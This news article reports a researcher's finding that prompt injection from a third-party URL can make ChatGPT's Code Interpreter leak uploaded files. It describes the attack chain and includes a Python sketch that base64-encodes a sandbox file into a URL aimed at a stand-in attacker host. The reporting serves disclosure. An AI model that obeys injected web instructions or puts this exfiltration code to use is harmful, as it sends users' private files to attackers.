ChatGPT’s Code Interpreter tool can be exploited by hackers to steal your data.



What you need to know

  • ChatGPT Plus subscribers now have access to Code Interpreter, a tool that uses the AI to write Python code and run it in a sandboxed environment.
  • A security researcher has disclosed that the feature can be exploited to steal data from files users upload.
  • Uploaded files live inside that sandbox, so a successful prompt injection attack can read them and hand their contents to an attacker.
  • The technique involves tricking ChatGPT into executing instructions from a third-party URL, which tell it to encode uploaded files into a string and send that data to a malicious site.

For a while now, we’ve known ChatGPT can achieve incredible things and make work easier for users, from developing software in under 7 minutes to solving complex math problems. While it was already possible to write code with ChatGPT, OpenAI recently debuted its Code Interpreter tool, which makes the process far more seamless.

According to Tom’s Hardware and cybersecurity expert Johann Rehberger, the tool uses the AI to write Python code and even runs it in a sandboxed environment. And while this is an impressive feat, the sandboxed environment is also what draws attackers: it holds any files you upload, and those files can be stolen.
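
To make the mechanics concrete, here is a minimal Python sketch of the encode-and-exfiltrate step the report describes. The file path and attacker endpoint below are hypothetical placeholders, and the snippet illustrates the shape of the technique rather than Rehberger's actual payload:

    import base64
    import urllib.parse

    # Hypothetical placeholders -- neither value comes from the article.
    # Code Interpreter stores uploaded files inside its sandbox; this path
    # stands in for one of them, the URL for an attacker-controlled endpoint.
    TARGET_FILE = "/tmp/uploaded_secrets.txt"
    ATTACKER_URL = "http://attacker.example/collect"

    def build_exfil_url(path: str, endpoint: str) -> str:
        """Encode a file's contents into a URL-safe string and append it
        as a query parameter -- the exfiltration channel the article
        describes ChatGPT being tricked into constructing."""
        with open(path, "rb") as f:
            payload = base64.urlsafe_b64encode(f.read()).decode("ascii")
        return f"{endpoint}?{urllib.parse.urlencode({'data': payload})}"

    print(build_exfil_url(TARGET_FILE, ATTACKER_URL))

In the real attack, the victim never runs anything like this themselves: hidden instructions on a malicious webpage get ChatGPT to build the equivalent inside its own sandbox and present the resulting link, so the encoded file contents land in the attacker's server logs.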

